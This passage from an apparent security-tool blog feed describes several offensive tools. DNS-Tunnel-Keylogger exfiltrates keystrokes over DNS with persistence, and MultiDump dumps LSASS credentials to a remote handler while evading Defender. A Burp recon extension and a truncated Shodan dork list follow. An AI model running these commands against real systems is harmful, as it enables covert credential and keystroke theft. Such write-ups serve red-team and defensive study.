href="https://opensky-network.org/datasets/metadata/aircraftDatabase.csv" rel="nofollow" target="_blank" title="OpenSky API">OpenSky API</a></p> <p><a href="https://aviationweather.gov" rel="nofollow" target="_blank" title="Aviation Weather METAR">Aviation Weather METAR</a></p> <p><a href="https://pkgstore.datahub.io/core/airport-codes/airport-codes/archive/dfadb79d7ba34a49242332f2eaf4f1b0/airport-codes.csv" rel="nofollow" target="_blank" title="Airport Codes Dataset">Airport Codes Dataset</a></p> <h2>Contributing</h2> <p>skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.</p> <h2>Upcoming</h2> <ul> <li>Obtain Latest Flown Airports</li> <li>Obtain Airport Information</li> <li>Obtain ATC Frequency Information</li> </ul> <h2>Support</h2> <p>If you enjoyed skytrack, please consider <a href="https://github.com/sponsors/ANG13T" rel="nofollow" target="_blank" title="becoming a sponsor">becoming a sponsor</a> or donating on <a href="https://www.buymeacoffee.com/angelinatsuboi" rel="nofollow" target="_blank" title="buymeacoffee">buymeacoffee</a> in order to fund my future projects. 
</p> <p>To check out my other works, visit my <a href="https://github.com/ANG13T" rel="nofollow" target="_blank" title="GitHub profile">GitHub profile</a>.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ANG13T/skytrack" rel="nofollow" target="_blank" title="Download Skytrack">Download Skytrack</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-55233407003411976452024-03-21T08:30:00.001-03:002024-03-21T08:30:00.131-03:00DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-MbgnPNfgz9FUxSjMWOICT5WjlMECKLZ2jTAdJWKeuLbrRO2sLroiea4FI4jPuKmACSKB7fji-QYdYHwewWGVxcjweCDvCWroVw4j_Fvd1ONNIVdzyNK0pvMkfBGQurlbhDHPvlI5YafZGI2SZf_idJWkMGt0QaMP8du2XyJQIqRWbVdQ1XzzFQ8mngZ2/s457/DNS-Tunnel-Keylogger_1_CustomNS_Screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="178" data-original-width="457" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-MbgnPNfgz9FUxSjMWOICT5WjlMECKLZ2jTAdJWKeuLbrRO2sLroiea4FI4jPuKmACSKB7fji-QYdYHwewWGVxcjweCDvCWroVw4j_Fvd1ONNIVdzyNK0pvMkfBGQurlbhDHPvlI5YafZGI2SZf_idJWkMGt0QaMP8du2XyJQIqRWbVdQ1XzzFQ8mngZ2/w640-h250/DNS-Tunnel-Keylogger_1_CustomNS_Screenshot1.png" width="640" /></a></div><p><br /></p> <p>This <a href="https://www.kitploit.com/search/label/Post-Exploitation" target="_blank" title="post-exploitation">post-exploitation</a> keylogger will covertly exfiltrate <a href="https://www.kitploit.com/search/label/Keystrokes" target="_blank" title="keystrokes">keystrokes</a> to a server. 
</p> <p>These tools excel at lightweight <a href="https://www.kitploit.com/search/label/Exfiltration" target="_blank" title="exfiltration">exfiltration</a> and persistence, properties which will prevent detection. The keylogger uses DNS tunnelling/exfiltration to bypass firewalls and avoid detection.</p><span><a name='more'></a></span><p><br /></p> <h1>Server</h1> <h2>Setup</h2> <p>The server uses python3.</p> <p>To install dependencies, run <code>python3 -m pip install -r requirements.txt</code></p> <h2>Starting the Server</h2> <p>To start the server, run <code>python3 main.py</code></p> <pre><code>usage: dns exfiltration server [-h] [-p PORT] ip domain<br /><br />positional arguments:<br /> ip<br /> domain<br /><br />options:<br /> -h, --help show this help message and exit<br /> -p PORT, --port PORT port to listen on<br /></code></pre> <p>By default, the server listens on UDP port 53. Use the <code>-p</code> flag to specify a different port.</p> <p><code>ip</code> is the IP address of the server. 
It is used in SOA and NS records, which allow other nameservers to find the server.</p> <p><code>domain</code> is the domain to listen for, which should be the domain that the server is authoritative for.</p> <h2>Registrar</h2> <p>On the registrar, change your domain's nameservers to custom DNS.</p> <p>Point them to two hostnames, <code>ns1.example.com</code> and <code>ns2.example.com</code>.</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-MbgnPNfgz9FUxSjMWOICT5WjlMECKLZ2jTAdJWKeuLbrRO2sLroiea4FI4jPuKmACSKB7fji-QYdYHwewWGVxcjweCDvCWroVw4j_Fvd1ONNIVdzyNK0pvMkfBGQurlbhDHPvlI5YafZGI2SZf_idJWkMGt0QaMP8du2XyJQIqRWbVdQ1XzzFQ8mngZ2/s457/DNS-Tunnel-Keylogger_1_CustomNS_Screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="178" data-original-width="457" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-MbgnPNfgz9FUxSjMWOICT5WjlMECKLZ2jTAdJWKeuLbrRO2sLroiea4FI4jPuKmACSKB7fji-QYdYHwewWGVxcjweCDvCWroVw4j_Fvd1ONNIVdzyNK0pvMkfBGQurlbhDHPvlI5YafZGI2SZf_idJWkMGt0QaMP8du2XyJQIqRWbVdQ1XzzFQ8mngZ2/w640-h250/DNS-Tunnel-Keylogger_1_CustomNS_Screenshot1.png" width="640" /></a></p> <p>Add records that point the nameserver hostnames to your exfiltration server's IP address.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwIzUQXx8D6TPxMJcpSXznc9STFc59Vaksk9l5e1dNiC6fpW5OKCr9KfAvyUtL_J3w_7rp5Tr1KKPdxV-uDN7fPmV0HAWXRoQv1na__MKmCBvz-2dPw2nfj530CukUJ0u5WbzRnJ0skljClT2faH63Q9ESTNaUlHPwQxg4o5J6lyjeB4n_peazuVEZNFSd/s1138/DNS-Tunnel-Keylogger_2_CustomNS_Screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="343" data-original-width="1138" height="192" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwIzUQXx8D6TPxMJcpSXznc9STFc59Vaksk9l5e1dNiC6fpW5OKCr9KfAvyUtL_J3w_7rp5Tr1KKPdxV-uDN7fPmV0HAWXRoQv1na__MKmCBvz-2dPw2nfj530CukUJ0u5WbzRnJ0skljClT2faH63Q9ESTNaUlHPwQxg4o5J6lyjeB4n_peazuVEZNFSd/w640-h192/DNS-Tunnel-Keylogger_2_CustomNS_Screenshot2.png" width="640" /></a></div> <p>This is the same as setting glue records.</p> <h1>Client</h1> <h2>Linux</h2> <p>The Linux keylogger consists of two bash scripts. <code>connection.sh</code> is used by the <code>logger.sh</code> script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the <code>connection.sh</code> script. It will automatically establish a connection and send the data.</p> <h3><code>logger.sh</code></h3> <pre><code># Usage: logger.sh [-options] domain<br /># Positional Arguments:<br /># domain: the domain to send data to<br /># Options:<br /># -p path: give path to log file to listen to<br /># -l: run the logger with warnings and errors printed<br /></code></pre> <p>To start the keylogger, run the command <code>./logger.sh [domain] && exit</code>. This will silently start the keylogger, and any inputs typed will be sent. The <code>&& exit</code> at the end will cause the shell to close on <code>exit</code>. Without it, exiting will bring you back to the non-keylogged shell. Remove the <code>&> /dev/null</code> to display error messages.</p> <p>The <code>-p</code> option specifies the location of the temporary log file where all the inputs are sent to. By default, this is <code>/tmp/</code>.</p> <p>The <code>-l</code> option shows warnings and errors, which can be useful for debugging.</p> <p><code>logger.sh</code> and <code>connection.sh</code> must be in the same directory for the keylogger to work. 
If you want persistence, you can add the command to <code>.profile</code> to start on every new interactive shell.</p> <h3><code>connection.sh</code></h3> <pre><code>Usage: command [-options] domain<br />Positional Arguments:<br /> domain: the domain to send data to<br />Options:<br /> -n: number of characters to store before sending a packet<br /></code></pre> <h2>Windows</h2> <h3>Build</h3> <p>To build the <a href="https://www.kitploit.com/search/label/Keylogging" target="_blank" title="keylogging">keylogging</a> program, run <code>make</code> in the <code>windows</code> directory. To build with reduced size and some amount of obfuscation, make the <code>production</code> target. This will create the <code>build</code> directory for you and output to a file named <code>logger.exe</code> in the <code>build</code> directory.</p> <p><code>make production domain=example.com</code></p> <p>You can also choose to build the program with <a href="https://www.kitploit.com/search/label/Debugging" target="_blank" title="debugging">debugging</a> by making the <code>debug</code> target.</p> <p><code>make debug domain=example.com</code></p> <p>For both targets, you will need to specify the domain the server is listening for.</p> <h2>Sending Test Requests</h2> <p>You can use <code>dig</code> to send requests to the server:</p> <p><code>dig @127.0.0.1 a.1.1.1.example.com A +short</code> sends a connection request to a server on localhost.</p> <p><code>dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short</code> sends a test message to localhost.</p> <p>Replace <code>example.com</code> with the domain the server is listening for.</p> <h1>Protocol</h1> <h2>Starting a Connection</h2> <p>A record requests starting with <code>a</code> indicate the start of a "connection." 
When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.</p> <p>The following is the format to follow for starting a connection: <code>a.1.1.1.[sld].[tld].</code></p> <p>The server will respond with an IP address in the following format: <code>123.123.123.[id]</code></p> <p>Concurrent connections cannot exceed 254, and clients are never considered "disconnected."</p> <h2>Exfiltrating Data</h2> <p>A record requests starting with <code>b</code> indicate exfiltrated data being sent to the server.</p> <p>The following is the format to follow for sending data after establishing a connection: <code>b.[packet #].[id].[data].[sld].[tld].</code></p> <p>The server will respond with <code>[code].123.123.123</code></p> <p><code>id</code> is the id that was established on connection. Data is sent as ASCII encoded in hex.</p> <p><code>code</code> is one of the codes described below.</p> <h2>Response Codes</h2> <h3><code>200</code>: OK</h3> <p>If the client sends a request that is processed normally, the server will respond with code <code>200</code>.</p> <h3><code>201</code>: Malformed Record Requests</h3> <p>If the client sends a malformed record request, the server will respond with code <code>201</code>.</p> <h3><code>202</code>: Non-Existent Connections</h3> <p>If the client sends a data packet with an id greater than the number of connections, the server will respond with code <code>202</code>.</p> <h3><code>203</code>: Out of Order Packets</h3> <p>If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code <code>203</code>. Clients and servers should reset their packet numbers to 0. 
Then the client can resend the packet with the new packet id.</p> <h3><code>204</code>: Reached Max Connections</h3> <p>If the client attempts to create a connection when the maximum has been reached, the server will respond with code <code>204</code>.</p> <h2>Dropped Packets</h2> <p>Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.</p> <h1>Side Notes</h1> <h2>Linux</h2> <h3>Log File</h3> <p>The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like <code>cat</code>, you should select the appropriate option to print ASCII control characters, such as <code>-v</code> for <code>cat</code>, or open it in a text editor.</p> <h3>Non-Interactive Shells</h3> <p>The keylogger relies on <code>script</code>, so the keylogger won't run in non-interactive shells.</p> <h2>Windows</h2> <h3>Repeated Requests</h3> <p>For some reason, the Windows <code>Dns_Query_A</code> always sends duplicate requests. 
The server will process it fine because it discards repeated packets.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Geeoon/DNS-Tunnel-Keylogger" rel="nofollow" target="_blank" title="Download DNS-Tunnel-Keylogger">Download DNS-Tunnel-Keylogger</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-20971502194654544422024-03-20T08:30:00.001-03:002024-03-20T08:30:00.129-03:00MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHkWIUNTUhU6q2CWK3Den9jy-peZwSi_8_9eLB_LiCSJiZLaXVTyjJ7wDWM0FXXc-NVlrnrAWhhKF1DNIWUojP6IgNhw-etA8a4d5oTIAlei2cMX0WL2LoO65qnycGmmudHm0RcePYBIQrBLzc3aq0w8Igy1jT_XGs4mNpHyA4Zr26jwxstcCzmW5TMLf4/s1569/MultiDump_1_multidump-defender.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="738" data-original-width="1569" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHkWIUNTUhU6q2CWK3Den9jy-peZwSi_8_9eLB_LiCSJiZLaXVTyjJ7wDWM0FXXc-NVlrnrAWhhKF1DNIWUojP6IgNhw-etA8a4d5oTIAlei2cMX0WL2LoO65qnycGmmudHm0RcePYBIQrBLzc3aq0w8Igy1jT_XGs4mNpHyA4Zr26jwxstcCzmW5TMLf4/w640-h302/MultiDump_1_multidump-defender.gif" width="640" /></a></div><p><br /></p> <p>MultiDump is a <a href="https://www.kitploit.com/search/label/Post-Exploitation" target="_blank" title="post-exploitation">post-exploitation</a> tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.</p> <p>Blog post: https://xre0us.io/posts/multidump</p><span><a name='more'></a></span><p><br /></p><p>MultiDump supports LSASS dumps via <code>ProcDump.exe</code> or <code>comsvcs.dll</code>. It offers two modes: a local mode that encrypts and stores the dump file 
locally, and a remote mode that sends the dump to a handler for <a href="https://www.kitploit.com/search/label/Decryption" target="_blank" title="decryption">decryption</a> and analysis.</p> <h2>Usage</h2> <pre><code> __ __ _ _ _ _____<br /> | \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __<br /> | |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \<br /> | | | | |_| | | |_| | |__| | |_| | | | | | | |_) |<br /> |_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/<br /> |_|<br /><br />Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]<br /><br />-p Path to save procdump.exe, use full path. Default to temp directory<br />-l Path to save encrypted dump file, use full path. Default to current directory<br />-r Set ip:port to connect to a remote handler<br />--procdump Writes procdump to disk and use it to dump LSASS<br />--nodump Disable LSASS dumping<br />--reg Dump SAM, SECURITY and SYSTEM hives<br />--delay Increase interval between connections to for slower network speeds<br />-v Enable verbose mode<br /><br />MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.<br />Examples:<br /> MultiDump.exe -l C:\Users\Public\lsass.dmp -v<br /> MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000<br /></code></pre> <pre><code>usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]<br /><br />Handler for RemoteProcDump<br /><br />options:<br /> -h, --help show this help message and exit<br /> -r REMOTE, --remote REMOTE<br /> Port to receive remote dump file<br /> -l LOCAL, --local LOCAL<br /> Local dump file, key needed to decrypt<br /> --sam SAM Local SAM save, key needed to decrypt<br /> --security SECURITY Local SECURITY save, key needed to decrypt<br /> --system SYSTEM Local SYSTEM save, key needed to decrypt<br /> -k KEY, --key KEY Key to decrypt local file<br /> 
--override-ip OVERRIDE_IP<br /> Manually specify the IP address for key generation in remote mode, for proxied connection<br /></code></pre> <p>As with all LSASS related tools, Administrator/SeDebugPrivilege privileges are required.</p> <p>The handler depends on <a href="https://github.com/skelsec/pypykatz" rel="nofollow" target="_blank" title="Pypykatz">Pypykatz</a> to parse the LSASS dump, and <a href="https://github.com/fortra/impacket" rel="nofollow" target="_blank" title="impacket">impacket</a> to parse the registry saves. They should be installed in your environment. If you see the error <code>All detection methods failed</code>, it's likely the Pypykatz version is outdated.</p> <p>By default, MultiDump uses the <code>comsvcs.dll</code> method and saves the encrypted dump in the current directory.</p> <pre><code>MultiDump.exe<br />...<br />[i] Local Mode Selected. Writing Encrypted Dump File to Disk...<br />[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.<br />[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e<br /></code></pre> <pre><code>./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e<br /></code></pre> <p>If <code>--procdump</code> is used, <code>ProcDump.exe</code> will be written to disk to dump LSASS.</p> <p>In remote mode, MultiDump connects to the handler's listener.</p> <pre><code>./ProcDumpHandler.py -r 9001<br />[i] Listening on port 9001 for encrypted key...<br /></code></pre> <pre><code>MultiDump.exe -r 10.0.0.1:9001<br /></code></pre> <p>The key is encrypted with the handler's IP and port. 
When MultiDump connects through a proxy, the handler should use the <code>--override-ip</code> option to manually specify the IP address used for key generation in remote mode, so that the IP used for decryption matches the one set in MultiDump's <code>-r</code> argument.</p> <p>An additional option to dump the <code>SAM</code>, <code>SECURITY</code> and <code>SYSTEM</code> hives is available with <code>--reg</code>; the decryption process is the same as for LSASS dumps. This is more of a convenience feature to make post-exploitation <a href="https://www.kitploit.com/search/label/Information%20Gathering" target="_blank" title="information gathering">information gathering</a> easier.</p> <h3>Building MultiDump</h3> <p>Open in Visual Studio, build in <strong>Release</strong> mode.</p> <h3>Customising MultiDump</h3> <p>It is recommended to customise the binary before compiling, for example by changing the static strings or the RC4 key used to encrypt them. To do so, another Visual Studio project, <code>EncryptionHelper</code>, is included. 
Simply change the key or strings, and the output of the compiled <code>EncryptionHelper.exe</code> can be pasted into <code>MultiDump.c</code> and <code>Common.h</code>.</p> <p>Self-deletion can be toggled by uncommenting the following line in <code>Common.h</code>:</p> <pre><code>#define SELF_DELETION<br /></code></pre> <p>To further evade string analysis, most of the output messages can be excluded from compilation by commenting out the following line in <code>Debug.h</code>:</p> <pre><code>//#define DEBUG<br /></code></pre> <hr /> <p>MultiDump might get detected on <a href="https://www.kitploit.com/search/label/Windows%2010" target="_blank" title="Windows 10">Windows 10</a> 22H2 (19045) (sort of), and I have implemented a fix for it (sort of); the investigation and implementation deserve a blog post of their own: https://xre0us.io/posts/saving-lsass-from-defender/</p> <h2>Credits</h2> <ul> <li>Some <a href="https://www.kitploit.com/search/label/Techniques" target="_blank" title="techniques">techniques</a> used were learnt from <a href="https://maldevacademy.com" rel="nofollow" target="_blank" title="MalDev Academy">MalDev Academy</a>; it is an awesome course, highly recommended</li> <li>Inspired by <a href="https://github.com/djackreuter/proc_noprocdump" rel="nofollow" target="_blank" title="proc_noprocdump">proc_noprocdump</a></li> <li>Code to further process the LSASS dump from <a href="https://github.com/Hackndo/lsassy" rel="nofollow" target="_blank" title="lsassy">lsassy</a></li> <li>Testing and suggestions from <a href="https://github.com/ballro" rel="nofollow" target="_blank" title="ballro">ballro</a></li> <li>Testing and suggestions from <a href="https://github.com/DisplayGFX" rel="nofollow" target="_blank" title="DisplayGFX">DisplayGFX</a>, <a href="https://github.com/nthdeg" rel="nofollow" target="_blank" title="nthdeg">nthdeg</a> and silentbee</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" 
href="https://github.com/Xre0uS/MultiDump" rel="nofollow" target="_blank" title="Download MultiDump">Download MultiDump</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-77065327759531666782024-03-19T08:30:00.013-03:002024-03-19T08:30:00.131-03:00GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist<center><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh11U9atYP5tkgmZPdqWYxW_DJ5xNIlXShlnf_vPmhm_yDPRFpGNQFGFXcTFI1HljcetRWbNtGmBLyl5CE3dIZ5hwBcs4loO8ru77h20-XxS1XRughFqfQfAdoM9gNKo0RAXkEBMgmIjYbHcJXjtL3f8yMJk3OiF0MsCqYh3vEl-QBi9iMXaDnwcxOvDfM"><img alt="" border="0" height="120" id="BLOGGER_PHOTO_ID_7347884014443827730" src="https://blogger.googleusercontent.com/img/a/AVvXsEh11U9atYP5tkgmZPdqWYxW_DJ5xNIlXShlnf_vPmhm_yDPRFpGNQFGFXcTFI1HljcetRWbNtGmBLyl5CE3dIZ5hwBcs4loO8ru77h20-XxS1XRughFqfQfAdoM9gNKo0RAXkEBMgmIjYbHcJXjtL3f8yMJk3OiF0MsCqYh3vEl-QBi9iMXaDnwcxOvDfM=w640-h120" width="640" /></a></center><center><br /></center> <p>This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target-specific <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlist</a> to use for fuzzing. The full Help documentation can be found <a href="https://github.com/xnl-h4ck3r/burp-extensions/blob/main/GAP%20Help.md" rel="nofollow" target="_blank" title="here">here</a> or from the Help icon on the GAP tab.</p><span><a name='more'></a></span><p><br /></p> <h2>TL;DR</h2> <h3>Installation</h3> <ol> <li>Visit the <a href="https://www.jython.org/download" rel="nofollow" target="_blank" title="Jython Official Site">Jython Official Site</a>, and download the latest stand-alone JAR file, e.g. 
<code>jython-standalone-2.7.3.jar</code>.</li> <li>Open Burp, go to <strong>Extensions</strong> -> <strong>Extension Settings</strong> -> <strong>Python Environment</strong>, set the <strong>Location of Jython standalone JAR file</strong> and <strong>Folder for loading modules</strong> to the <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> where the Jython JAR file was saved.</li> <li>On a command line, go to the directory where the jar file is and run <code>java -jar jython-standalone-2.7.3.jar -m ensurepip</code>.</li> <li>Download the <code>GAP.py</code> and <code>requirements.txt</code> from this project and place in the same directory.</li> <li>Install Jython modules by running <code>java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt</code>.</li> <li>Go to the <strong>Extensions</strong> -> <strong>Installed</strong> and click <strong>Add</strong> under <strong>Burp Extensions</strong>.</li> <li>Select <strong>Extension type</strong> of <strong>Python</strong> and select the <strong>GAP.py</strong> file.</li> </ol> <h3>Using</h3> <ol> <li>Just select a target in your <a href="https://www.kitploit.com/search/label/Burp" target="_blank" title="Burp">Burp</a> scope (or multiple targets), or even just one subfolder or endpoint, and choose extension <strong>GAP</strong>:</li> </ol> <p></p><center><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh1U3bPd3DBx2ZHTRtGYTp-eeYN0u434BN8S11n1tki2vU66KHWNzouVB5dEnX0nFf6yiV5YGxggTLgoADJmgKB8CdKo4sj0yQRF9cdQTxdZI-CTyq5Q498_OUyxuTpGEFfJnLs-TPbftk3qM4UPDNFOj-TXTemGiMoZDRe2iFxOMiY7U24Du7ceDzjueY"><img alt="" border="0" height="428" id="BLOGGER_PHOTO_ID_7347884023791381474" src="https://blogger.googleusercontent.com/img/a/AVvXsEh1U3bPd3DBx2ZHTRtGYTp-eeYN0u434BN8S11n1tki2vU66KHWNzouVB5dEnX0nFf6yiV5YGxggTLgoADJmgKB8CdKo4sj0yQRF9cdQTxdZI-CTyq5Q498_OUyxuTpGEFfJnLs-TPbftk3qM4UPDNFOj-TXTemGiMoZDRe2iFxOMiY7U24Du7ceDzjueY=w640-h428" width="640" 
/></a></center> <p>Or you can right-click a request or response in any other context and select <strong>GAP</strong> from the <strong>Extensions</strong> menu.</p> <ol> <li>Then go to the <strong>GAP</strong> tab to see the results:</li> </ol> <p></p><center><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiuWIo5ZmDRD0lKMGWfiZjWO6YCGOGkAjMJqaHHrzLKn0PM87A3GbTnTITI36-ugSoYF_8VIKCjcgHIUoThsLyFqzuo-FbaVCXyXNYXa9Xf60CExMWNs6wGvUhmqgBXmNk4fZ6qjuGBAkSTUcNq8Iz0MSHk9P5znGuzShPHQwiViseR4X0pfkaCMg6Lzz8"><img alt="" border="0" height="330" id="BLOGGER_PHOTO_ID_7347884028458490066" src="https://blogger.googleusercontent.com/img/a/AVvXsEiuWIo5ZmDRD0lKMGWfiZjWO6YCGOGkAjMJqaHHrzLKn0PM87A3GbTnTITI36-ugSoYF_8VIKCjcgHIUoThsLyFqzuo-FbaVCXyXNYXa9Xf60CExMWNs6wGvUhmqgBXmNk4fZ6qjuGBAkSTUcNq8Iz0MSHk9P5znGuzShPHQwiViseR4X0pfkaCMg6Lzz8=w640-h330" width="640" /></a></center> <h2>IMPORTANT Notes</h2> <p>If you don't need one of the modes, then un-check it, as results will be quicker.</p> <p>If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP, as unfortunately this can make it a lot slower. It will be more efficient if you run it for one or two targets in the Site Map view at a time, as huge projects can consume a lot of resources.</p> <p>If you want to run GAP on one or more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from the proxy history.</p> <p>It is hard to design GAP to display all controls for all screen resolutions and font sizes. 
I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the <code>Ctrl</code> button and click the GAP logo header image to remove it to make more space.</p> <p>The Words mode uses the <code>beautifulsoup4</code> <a href="https://www.kitploit.com/search/label/Library" target="_blank" title="library">library</a> and this can be quite slow, so be patient!</p> <h2>In Depth Instructions</h2> <p>Below is an in-depth look at the GAP Burp extension, from installing it successfully to explaining all of the features.</p> <p><strong>NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.</strong></p> <p style="text-align: center;"><iframe width="560" height="315" src="https://www.youtube.com/embed/Os3bN0zUROA?si=nh4llqs7b4UWgheg" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe></p> <h2>TODO</h2> <ul> <li>Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, GraphQL, etc.</li> <li>Add an option to not add the <code>Tentative</code> Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).</li> <li>Improve <a href="https://www.kitploit.com/search/label/Performance" target="_blank" title="performance">performance</a> of the link-finding regular expressions.</li> <li>Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!</li> <li>Deal with other display sizes and font sizes better to make sure all controls are viewable.</li> <li>If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.</li> <li>Use an alternative to <code>beautifulsoup4</code> that is faster to parse responses for Words.</li> </ul> <p>Good luck and good hunting! 
If you really love the tool (or any others), or they helped you find an awesome bounty, consider <a href="https://ko-fi.com/xnlh4ck3r" rel="nofollow" target="_blank" title="BUYING ME A COFFEE!">BUYING ME A COFFEE!</a> (I could use the caffeine!)</p> <p>/XNL-h4ck3r</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/xnl-h4ck3r/GAP-Burp-Extension" rel="nofollow" target="_blank" title="Download GAP-Burp-Extension">Download GAP-Burp-Extension</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-81316120703268537362024-03-18T08:30:00.000-03:002024-03-18T08:30:00.134-03:00Shodan Dorks<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/s2174/shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1238" data-original-width="2174" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/w640-h364/shodan.png" width="640" /></a></div><p><br /></p><h3>Shodan Dorks by twitter.com/lothos612</h3> <p>Feel free to make suggestions</p><span><a name='more'></a></span><p><br /></p> <h1>Shodan Dorks</h1> <h1>Basic Shodan Filters</h1> <h3>city:</h3> <p>Find devices in a particular city. <code>city:"Bangalore"</code></p> <h3>country:</h3> <p>Find devices in a particular country. <code>country:"IN"</code></p> <h3>geo:</h3> <p>Find devices by giving geographical coordinates. 
<code>geo:"56.913055,118.250862"</code></p> <h3>Location</h3> <p><code>country:us</code> <code>country:ru country:de city:chicago</code></p> <h3>hostname:</h3> <p>Find devices matching the hostname. <code>server: "gws" hostname:"google"</code> <code>hostname:example.com -hostname:subdomain.example.com</code> <code>hostname:example.com,example.org</code></p> <h3>net:</h3> <p>Find devices based on an IP address or a CIDR range. <code>net:210.214.0.0/16</code></p> <h3>Organization</h3> <p><code>org:microsoft</code> <code>org:"United States Department"</code></p> <h3>Autonomous System Number (ASN)</h3> <p><code>asn:ASxxxx</code></p> <h3>os:</h3> <p>Find devices based on operating system. <code>os:"windows 7"</code></p> <h3>port:</h3> <p>Find devices based on open ports. <code>proftpd port:21</code></p> <h3>before/after:</h3> <p>Find devices seen before or after a given date, or between two dates. <code>apache after:22/02/2009 before:14/3/2010</code></p> <h3>SSL/TLS Certificates</h3> <p>Self-signed certificates <code>ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com</code></p> <p>Expired certificates <code>ssl.cert.expired:true</code></p> <p><code>ssl.cert.subject.cn:example.com</code></p> <h3>Device Type</h3> <p><code>device:firewall</code> <code>device:router</code> 